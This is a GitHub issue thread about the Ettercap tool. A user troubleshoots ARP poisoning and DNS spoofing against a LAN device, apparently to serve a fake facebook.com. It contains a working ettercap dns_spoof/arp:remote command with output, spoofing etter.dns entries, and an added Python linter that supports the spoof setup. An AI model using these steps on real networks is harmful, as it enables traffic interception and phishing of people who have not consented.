Ettercap / ettercap

Ettercap Project
http://www.ettercap-project.org
GNU General Public License v2.0

Segmentation Fault when uncommenting iptables redir command #1044

Closed NanduKkd closed 4 years ago

NanduKkd commented 4 years ago

I uncommented the redir_command "iptables ..." in the config file and then ran ettercap -G. The ettercap window opened and I selected wlan0 and unified sniffing options, and when I pressed the accept button, it crashed and showed segmentation fault in the terminal. I can't figure out why. And also, I'm not experienced with Kali and ettercap. I don't actually know what kind of details I should specify. If anyone tells me how, I will do that. And excuse me for my poor English too :)

koeppea commented 4 years ago

Hi,

have you tried to uncomment the redir6_commands ?

This bug should be fixed in 0.8.4-rc (master on GitHub).

Please try and feed back if that helped. If not, you might have to replace your distribution-provided version of ettercap with the most current version compiled from the GitHub source code.

NanduKkd commented 4 years ago

Hi,

have you tried to uncomment the redir6_commands ?

That worked, it didn't crash now! Thank you for the quick reply. I appreciate it. <3

NanduKkd commented 4 years ago

Hi again, Ettercap didn't crash now, it went ok. But I'm having another problem here. I did everything as written in this tutorial. I have a device connected on my LAN. I am not able to show my version of facebook.com on that device, the original facebook.com shows up. I can't understand why. And I don't know if this might be of any help, but the ettercap's output view showed this when opened:

Lua: no scripts were specified, not starting up!

Thanks!

koeppea commented 4 years ago

I had a look at this tutorial. It's basically not correct. Enabling the redir_commands just makes Ettercap intercept SSL. But that, especially in today's world, is quite tricky and has many pitfalls. For that topic I plan a dedicated tutorial video on YouTube and I'm afraid it will get a 30 min duration due to all of the things that have to be pointed out.

So basically you don't need to uncomment the redir commands. To redirect your victim to another IP address when it's typing a dns-name, you just edit your etter.dns (I recommend removing all the examples to avoid conflicts with what you want to achieve) and enable the plugin during runtime.

You can test if the DNS spoofing worked, by just pinging the DNS name and check if it tries to ping the spoofed IP. You should also see a message in Ettercap. But mind the local DNS cache that Windows has enabled by default.

Now to Facebook: this is one of the pages that are part of the pre-built list, hardcoded in the browser, that require SSL right from the beginning. If the browser then has cached the HSTS for this site from a previous visit, you must have a valid certificate for that site on your fake webserver that the victim trusts (basically it has to trust its signer certificate). See our Wiki article for more info on that.

The LUA message can be ignored. This is just a status message, since Ettercap seems to have been built with the experimental LUA support.

NanduKkd commented 4 years ago

So that unnecessary uncommenting of the redir_commands part cost me hours!

I will try the way you said and will reply here. And I'm using an Android tablet as the target. I don't know, but I have read that Android stores the local DNS cache for like forever. I'll have to think of that.

And about the SSL, I'll have to learn more. I'm kind of self taught, so I dont know much. The wiki was good though.

About the YouTube video. I don't know if this is a good idea, but why don't you do it as two or three parts?

Anyway Thanks! I'm really loving this community thing of Github!

koeppea commented 4 years ago

About the YouTube video. I don't know if this is a good idea, but why don't you do it as two or three parts?

Because 0.8.3 and 0.8.4-rc have so many SSL-related fixes and improvements, trying to keep up with the pace of the TLS standard and the surrounding technologies like HSTS. But essentially it's just about intercepting an SSL stream. And for that single "requirement" or "task", there is much to say. I will see when I find time to record that.

NanduKkd commented 4 years ago

Hi, I tried that dns spoof plugin, I couldn't work that out.

My etter.dns:

myownfakeserver.com    A   203.124.115.1 3600
*.myownfakeserver.com  A   203.124.115.1

I used a non-existent domain name so that I don't have to worry about the local DNS cache problem. I got the IP address by pinging a server of a nearby institution.

I ran Ettercap in text only mode:

# ettercap -T -P dns_spoof -M arp:remote -d -E /192.168.43.1// /192.168.43.245//

ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team

Listening on:
 wlan0 -> 90:48:9A:00:66:DF
          192.168.43.182/255.255.255.0
          fe80::865e:3754:2523:e571/64
          2401:4900:22d2:9fc:e7a4:c520:3c1f:1ff7/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to EUID 0 EGID 0...

  34 plugins
  42 protocol dissectors
  57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...
Resolving 2 hostnames...
* |==================================================>| 100.00 %

ARP poisoning victims:

 GROUP 1 : 192.168.43.1 9C:6B:72:1B:59:27

 GROUP 2 : 192.168.43.245 40:A1:08:54:E2:4F
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Mon Jun  8 08:36:58 2020 [851766]
40:A1:08:54:E2:4F --> 90:48:9A:00:66:DF
  192.168.43.245:0 --> 192.168.43.1:0 |  (0)

Mon Jun  8 08:37:18 2020 [47405]
40:A1:08:54:E2:4F --> 90:48:9A:00:66:DF
UDP  192.168.43.245:22816 --> 8.8.8.8:53 |  (28)
.............google.com.....

Mon Jun  8 08:37:18 2020 [204931]
9C:6B:72:1B:59:27 --> 90:48:9A:00:66:DF
UDP  8.8.8.8:53 --> 192.168.43.245:22816 |  (44)
.............google.com....................

Closing text interface...

Terminating ettercap...
Lua cleanup complete!
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

40:A1:08:54:E2:4F - target 90:48:9A:00:66:DF - attacker 9C:6B:72:1B:59:27 - Default gateway

EDIT

I was able to spoof the domain name, I think. I was using spaces instead of tabs in the etter.dns file, my mistake. Now, when I go to the browser from the target device and type myownfakeserver.com, my ettercap console shows that the address is being spoofed. But I'm having another problem now. The ettercap console does show that the IP address is being spoofed, but the browser just shows the DNS_PROBE_FINISHED_NXDOMAIN error. I don't understand why. Then I changed the IP address in etter.dns to the attacker's IP address and started an Apache server and ran it. This time too, the NXDOMAIN error showed up. Is it because of any certificate problems?

NanduKkd commented 4 years ago

This tutorial also says that we should uncomment the redir_commands to do DNS spoofing. I first thought that that was kali's official site! I should have checked the domain address carefully.

koeppea commented 4 years ago

@NanduKkd reg the NXDomain, Can you try the following content of your etter.dns?

myownfakeserver.com    A   203.124.115.1 3600
*.myownfakeserver.com  A   203.124.115.1
myownfakeserver.com AAAA ::
*.myownfakeserver.com AAAA ::

I double checked the source code. The fields just have to be separated by whitespace: one or more spaces and/or tabs. When you check the ettercap-0.8.4-rc_debug.log file, you can see how your etter.dns file is parsed. If it's really parsed wrongly, I'd be very interested to get a binary copy (not copy&paste) of your etter.dns file for further analysis.
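The two points koeppea makes above (fields separated by any run of spaces and/or tabs, and the missing AAAA answer behind the NXDOMAIN error) can be checked before loading the plugin. The following is an added example written for this page, not code from the ettercap project: it parses an etter.dns file with the same whitespace rule, validates the A/AAAA values, reports every name that spoofs A without an AAAA record, and emits the `AAAA ::` lines koeppea suggested. The sample file and its addresses are constructed placeholders; the comment-character and the `name type value [ttl]` layout are taken from the thread's own etter.dns excerpt.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample modelled on the etter.dns posted in the thread.
# The IP address is a placeholder, not a real server.
SAMPLE_ETTER_DNS = """\
# comment line, skipped by the parser
myownfakeserver.com    A   203.124.115.1 3600
*.myownfakeserver.com  A   203.124.115.1
"""


@dataclass
class Record:
    name: str
    rtype: str
    value: str
    ttl: Optional[int]  # optional trailing TTL, as on the first sample line


def parse_etter_dns(text: str) -> List[Record]:
    """Parse etter.dns records: 'name type value [ttl]'.

    Fields are separated by one or more spaces and/or tabs (str.split
    accepts both), '#' starts a comment and blank lines are ignored.
    A malformed line or a bad A/AAAA literal raises ValueError so a typo
    is caught here rather than silently ignored at runtime.
    """
    records: List[Record] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) not in (3, 4):
            raise ValueError(
                f"line {lineno}: expected 'name type value [ttl]', got {raw!r}")
        name, rtype, value = fields[0], fields[1].upper(), fields[2]
        ttl = int(fields[3]) if len(fields) == 4 else None
        if rtype == "A":
            ipaddress.IPv4Address(value)   # raises on a bad IPv4 literal
        elif rtype == "AAAA":
            ipaddress.IPv6Address(value)   # '::' is a valid unspecified address
        records.append(Record(name, rtype, value, ttl))
    return records


def names_missing_aaaa(records: List[Record]) -> List[str]:
    """Names with an A record but no AAAA record.

    A dual-stack client sends both an A and an AAAA query. The thread's
    observation is that spoofing only the A answer left the target with
    DNS_PROBE_FINISHED_NXDOMAIN, and that adding an 'AAAA ::' record for
    the same name fixed it. This lint flags exactly those names.
    """
    by_type = defaultdict(set)
    for rec in records:
        by_type[rec.rtype].add(rec.name)
    return sorted(by_type["A"] - by_type["AAAA"])


def add_blank_aaaa(text: str) -> str:
    """Return the file text with 'name AAAA ::' appended for each name
    that spoofs A but lacks an AAAA record."""
    missing = names_missing_aaaa(parse_etter_dns(text))
    if not missing:
        return text
    extra = "\n".join(f"{name} AAAA ::" for name in missing)
    return text.rstrip("\n") + "\n" + extra + "\n"


if __name__ == "__main__":
    for name in names_missing_aaaa(parse_etter_dns(SAMPLE_ETTER_DNS)):
        print(f"warning: {name} has an A record but no AAAA record")
    print(add_blank_aaaa(SAMPLE_ETTER_DNS))
```

Run it against the real file with `python3 lint_etter_dns.py` after pointing `SAMPLE_ETTER_DNS` at `/etc/ettercap/etter.dns` (the path varies by distribution, so it is not hardcoded here). Note that the wildcard entry is matched by exact name only; this lint does not reproduce the plugin's wildcard matching, it only checks that each A line has an AAAA companion.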

koeppea commented 4 years ago

Reg. the tutorial, I left a comment so that (hopefully) the author corrects the incorrectness of its blog content.

NanduKkd commented 4 years ago

@koeppea Thanks! Sending the blank response for IPv6 did the part! Well, most of the tutorials (all those which I've read) available on the net just ignore that part. I ran ettercap again, this time I replaced the separating tabs with whitespace in the etter.dns file and it worked! You are right. Maybe I messed up something last time.

Thanks for helping, you guys are really great on that part! I guess you can close this issue now👍

koeppea commented 4 years ago

Closing then....